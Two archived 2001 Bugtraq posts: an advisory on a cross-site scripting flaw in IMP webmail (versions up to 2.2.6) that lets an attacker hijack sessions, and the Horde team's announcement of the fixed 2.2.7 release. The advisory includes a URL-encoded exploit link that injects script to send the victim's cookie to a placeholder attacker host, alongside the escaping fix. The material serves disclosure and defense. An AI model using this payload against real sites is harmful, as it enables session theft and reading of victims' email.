7467685 2001-11-09 21:38 +0000  /84 rader/ Joao Pedro Goncalves <megas@phibernet.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-11-10  01:18  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: megas@phibernet.org
Mottagare: Bugtraq (import) <19712>
Ärende: Imp Webmail session hijacking vulnerability
------------------------------------------------------------
From: Joao Pedro Goncalves <megas@phibernet.org>
To: bugtraq@securityfocus.com
Message-ID: <01110921381901.10015@pinguim.sl.pt>

- It's possible to hijack an imp/horde session using a cross-site script      
   attack, quite  similar to the one explored by Marc Slemko in his 
   "Microsoft Passport to Trouble" paper.
 
- After hijacking the cookies, the attacker can use the session and read 
   the victim's mail.
 
- Imp webmail is part of the Horde Application Framework, at
   http://www.horde.org , which allows web access to an email account,
   through pop3 or imap.

- Imp is included in the Linux Madrake, Conectiva Distributions. 
   It's also available in the Redhat PowerTools.

- It's used in several webmail sites, some of which
   with hundreds of thousand of users, and all of the ones tested were        
   vulnerable. Some of the administrators were warned before this advisory 
   being public. Some have already been patched.
 
- All stable imp webmail versions, up to 2.2.6 including are
vulnerable, the  devel version, 2.3 and 3.0 Release Candidate 1 are
not affected by this  vulnerability.
 
- The horde team was warned about this and have commited a fix,
  a new version should be uploaded soon.
 
- To apply the patch use
  
http://cvs.horde.org/diff.php/imp/Attic/status.php3?r1=2.7.2.22&r2=2.7.2.23&ty=u
 
  or just escape the $message variable
  $message = htmlspecialchars($message);
  if your imp installation is already heavily customized.
 
 
- To exploit this vulnerability using a text message, the attacker sends an
   email with a url, where if the user clicks, is redirected to
 
http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript
%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co
m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%
20%27%3E%27)%3B%3C%2Fscript%3E%0A
 
which in return redirects the user's browser to the attacker's server
where  he hijacks the cookies that the browser used in the context of
the webmail  site, and the session therefore.
 
 
This attack is just one more example on how trusting user input is a
Bad  Thing(tm), as well as the risks inherent to cross-site script
attacks.
 
Please, pretty please, this was  discovered while playing around with
cookie-based session sites, after reading about the MS Wallet attack
and saw  how almost 2 years after the CERT advisory on these
techniques, lots of  applications are still vulnerable. There are
probably lots of kids around  exploiting similar vulnerabilities. So
check your web applications for  similar vulnerabilities and ask
yourself how many times have you pasted directly into the html some
variable passed by the url or cookie.

 
- For more info on cross-site scripting, read CERT advisory and 
   Marc Slemko's paper.
 
 
Imp Project homepage:
http://www.horde.org/imp/
 
Marc Slemko's "Microsoft Passport to Trouble":
http://alive.znep.com/~marcs/passport/
 
CERT advisory on cross-site scripting
http://www.cert.org/advisories/CA-2000-02.html

 
 
João Pedro Gonçalves
megas@phibernet.org
Phibernet Information Network
(7467685) /Joao Pedro Goncalves <megas@phibernet.org>/(Ombruten)
7470256 2001-11-10 09:05 -0600  /46 rader/ Brent J. Nordquist <bjn@horde.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-11-10  16:29  av Brevbäraren
Extern mottagare: imp@lists.horde.org
Extern mottagare: announce@lists.horde.org
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: lwn@lwn.net
Extern kopiemottagare: megas@phibernet.org
Externa svar till: bjn@horde.org
Mottagare: Bugtraq (import) <19713>
Ärende: IMP 2.2.7 (SECURITY) released
------------------------------------------------------------
From: "Brent J. Nordquist" <bjn@horde.org>
To: <imp@lists.horde.org>, <announce@lists.horde.org>
Cc: <bugtraq@securityfocus.com>, <lwn@lwn.net>, <megas@phibernet.org>
Message-ID: <Pine.LNX.4.33.0111100855360.24820-100000@kepler.acns.bethel.edu>

The Horde team announces the availability of IMP 2.2.7, which fixes a
potential session hijacking vulnerability using a cross-site
scripting (CSS) attack.  We recommend that all sites running IMP
2.2.x upgrade to this version.

The Horde Project would like to thank João Pedro Gonçalves from the
Phibernet Information Network <megas@phibernet.org> for discovering
this problem and alerting us.  From his description:

> - It's possible to hijack an imp/horde session using a cross-site
> script attack, quite similar to the one explored by Marc Slemko in his
> "Microsoft Passport to Trouble" paper.
> 
> - After hijacking the cookies, the attacker can use the session and read
> the victim's mail.
> 
> - All stable imp webmail versions, up to 2.2.6 including are vulnerable,
> the devel version, 2.3 and 3.0 Release Candidate 1 are not affected by
> this vulnerability.

This release also has a new Chinese (Simplified) translation.

Download:

This release can be downloaded from the following locations:

	ftp://ftp.horde.org/pub/horde/
	ftp://ftp.horde.org/pub/imp/

MD5 checksums:

2433ed0e67739c41021b1a9397130a96  horde-1.2.7.tar.gz
b5c683e1dc862fd185c9be0ce7188894  imp-2.2.7.tar.gz
818199bc9a92cff07d109c4b43a22ffe  patch-horde-1.2.6-1.2.7.gz
556ddcabc72048ae53f4cfb00680e6f5  patch-imp-2.2.6-2.2.7.gz

-- 
Brent J. Nordquist <bjn@horde.org> N0BJN
Yahoo!: Brent_Nordquist / AIM: BrentJNordquist / ICQ: 76158942
(7470256) /Brent J. Nordquist <bjn@horde.org>/(Ombruten)